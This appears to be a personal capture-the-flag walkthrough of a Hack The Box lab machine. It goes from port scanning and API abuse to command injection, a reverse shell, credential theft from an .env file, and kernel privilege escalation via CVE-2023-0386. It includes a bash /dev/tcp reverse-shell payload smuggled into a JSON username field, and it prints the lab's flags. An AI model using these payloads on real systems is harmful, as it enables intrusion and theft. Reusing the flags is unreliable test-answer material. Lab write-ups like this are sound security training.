ip : 10.129.19.181

sudo nmap -sC -sT 10.129.19.181
[sudo] password for sayed: 
Starting Nmap 7.99 ( https://nmap.org ) at 2026-04-14 11:57 +0530
Nmap scan report for 10.129.19.181
Host is up (0.41s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT     STATE    SERVICE
22/tcp   open     ssh
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp   open     http
|_http-title: Did not follow redirect to http://2million.htb/
1036/tcp filtered nsstp


ffuf -u http://2million.htb/FUZZ -w /usr/share/wordlists/dirb/common.txt -mc 200
________________________________________________

 :: Method           : GET
 :: URL              : http://2million.htb/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirb/common.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200
________________________________________________

                        [Status: 200, Size: 64952, Words: 28274, Lines: 1243, Duration: 143ms]
404                     [Status: 200, Size: 1674, Words: 118, Lines: 46, Duration: 124ms]
invite                  [Status: 200, Size: 3859, Words: 1363, Lines: 97, Duration: 150ms]
login                   [Status: 200, Size: 3704, Words: 1365, Lines: 81, Duration: 121ms]
register                [Status: 200, Size: 4527, Words: 1512, Lines: 95, Duration: 121ms]
:: Progress: [4614/4614] :: Job [1/1] :: 271 req/sec :: Duration: [0:00:16] :: Errors: 0 ::


curl -k -X POST http://10.129.19.181/api/v1/invite/how/to/generate \ 
-H "Host: 2million.htb"
{"0":200,"success":1,"data":{"data":"Va beqre gb trarengr gur vaivgr pbqr, znxr n CBFG erdhrfg gb \/ncv\/i1\/vaivgr\/trarengr","enctype":"ROT13"},"hint":"Data is encrypted ... We should probbably check the encryption type in order to decrypt it..."}                                                                                                                                                                                             
┌──(sayed㉿kali)-[~/Desktop]
└─$ curl -k -X POST http://10.129.19.181/api/v1/invite/generate \
-H "Host: 2million.htb"
{"0":200,"success":1,"data":{"code":"VUM1UVMtTEI3MDktWVZSSDAtSFZLQ1c=","format":"encoded"}}

echo "VUM1UVMtTEI3MDktWVZSSDAtSFZLQ1c=" | base64 -d
UC5QS-LB709-YVRH0-HVKCW   

when we enter the Invite code in the /invite page, then we got the Register page.
    Now we are in the Page.

In the Registration page -> username : test
                            email    : test@gmail.com
                            pass     : test

 curl -s -p 2million.htb/api/v1 -H "Cookie: PHPSESSID=grkik4oe0h310rlu669a4n6h1t" | jq .
{
  "v1": {
    "user": {
      "GET": {
        "/api/v1": "Route List",
        "/api/v1/invite/how/to/generate": "Instructions on invite code generation",
        "/api/v1/invite/generate": "Generate invite code",
        "/api/v1/invite/verify": "Verify invite code",
        "/api/v1/user/auth": "Check if user is authenticated",
        "/api/v1/user/vpn/generate": "Generate a new VPN configuration",
        "/api/v1/user/vpn/regenerate": "Regenerate VPN configuration",
        "/api/v1/user/vpn/download": "Download OVPN file"
      },
      "POST": {
        "/api/v1/user/register": "Register a new user",
        "/api/v1/user/login": "Login with existing user"
      }
    },
    "admin": {
      "GET": {
        "/api/v1/admin/auth": "Check if user is admin"
      },
      "POST": {
        "/api/v1/admin/vpn/generate": "Generate VPN for specific user"
      },
      "PUT": {
        "/api/v1/admin/settings/update": "Update user settings"
      }
    }
  }
}


so in upper api endpoints : we have 3 admin endpoints.




PUT /api/v1/admin/settings/update HTTP/1.1
Host: 2million.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: http://2million.htb/home/access
Cookie: PHPSESSID=grkik4oe0h310rlu669a4n6h1t
Content-Type: application/json
Upgrade-Insecure-Requests: 1
Priority: u=0, i
Content-Length: 50

{
    "email": "test@gmail.com",
"is_admin":   1
}

Response : {"id":13,"username":"test","is_admin":1}    



now i found the command injection vuln in /api/admin/vpn/generate endpoint.
in Body section : 
{
    "username": "test$(bash -c 'bash -i >& /dev/tcp/10.10.16.227/4444 0>&1')"
}

then try rev shell we got the shell.


cat .env
DB_HOST=127.0.0.1
DB_DATABASE=htb_prod
DB_USERNAME=admin
DB_PASSWORD=SuperDuperPass123


Now login using ssh
got the admin user flag : 05e1e934edbee5811ccb4852ed5da4a6

then : 
find -user admin 2>/dev/null | grep -v '^/run|^/proc|^/sys'

after that i found a mail in the /var folder : which talks about OS patch update.
admin@2million:/var/mail$ cat admin 
From: ch4p <ch4p@2million.htb>
To: admin <admin@2million.htb>
Cc: g0blin <g0blin@2million.htb>
Subject: Urgent: Patch System OS
Date: Tue, 1 June 2023 10:45:22 -0700
Message-ID: <9876543210@2million.htb>
X-Mailer: ThunderMail Pro 5.2

Hey admin,

I'm know you're working as fast as you can to do the DB migration. While we're partially down, can you also upgrade the OS on our web host? There have been a few serious Linux kernel CVEs already this year. That one in OverlayFS / FUSE looks nasty. We can't get popped by that.

also i ran the linpeas.sh : got this : 

 ╔══════════╣ Kernel Exploit Registry (T1068)
═╣ Operating system ............. Linux                                                                                                                                                      
═╣ Kernel release ............... 5.15.70-051570-generic                                                                                                                                     
═╣ Comparable version ........... 5.15.70.051570                                                                                                                                             
═╣ Data chunk limit ............. max 25 rows per KERNEL_CVE_DATA_* variable (1..21)                                                                                                         
═╣ Kernel config source ......... /boot/config-5.15.70-051570-generic                                                                                                                        
CVE: CVE-2022-0847 | Name: DirtyPipe | Match data: pkg=linux-kernel,ver>=5.8,ver<=5.16.11 | Tags: ubuntu=(20.04|21.04),debian=11 | Rank: 1                                                   
CVE: CVE-2022-0995 | Name: watch_queue | Match data: pkg=linux-kernel,ver>=5.8,ver<5.16.5,x86_64 | Tags: ubuntu=21.10{kernel:5.13.0.37-generic} | Rank: 1 | Details: Not 100% reliable, may need to be run a couple of times. It rare cases it may panic the kernel.                                                                                                                      
CVE: CVE-2022-2586 | Name: nft_object UAF | Match data: pkg=linux-kernel,ver>=5.12,ver<5.19,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 | Tags: ubuntu=(20.04){kernel:5.12.13} | Rank: 1 | Details: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)                                                                                                 
CVE: CVE-2022-32250 | Name: nft_object UAF (NFT_MSG_NEWSET) | Match data: pkg=linux-kernel,ver<5.18.1,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 | Tags: ubuntu=(22.04){kernel:5.15.0-27-generic} | Rank: 1 | Details: kernel.unprivileged_userns_clone=1 required (to obtain CAP_NET_ADMIN)                                                                             
CVE: CVE-2023-0386 | Name: OverlayFS suid smuggle | Match data: pkg=linux-kernel,ver>=5.11,ver<=6.2,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 | Tags: ubuntu=22.04.1{kernel:5.15.0-57-generic} | Rank: 1 | Details: CONFIG_USER_NS needs to be enabled && kernel.unprivileged_userns_clone=1 required                                                                   
═╣ Kernel vulns found: 5


using CVE-2023-0386 i break the system and got the root level
    PoC :  https://github.com/sxlmnwb/CVE-2023-0386

root flag : 8597d91118a139ff412207eafc0e2765
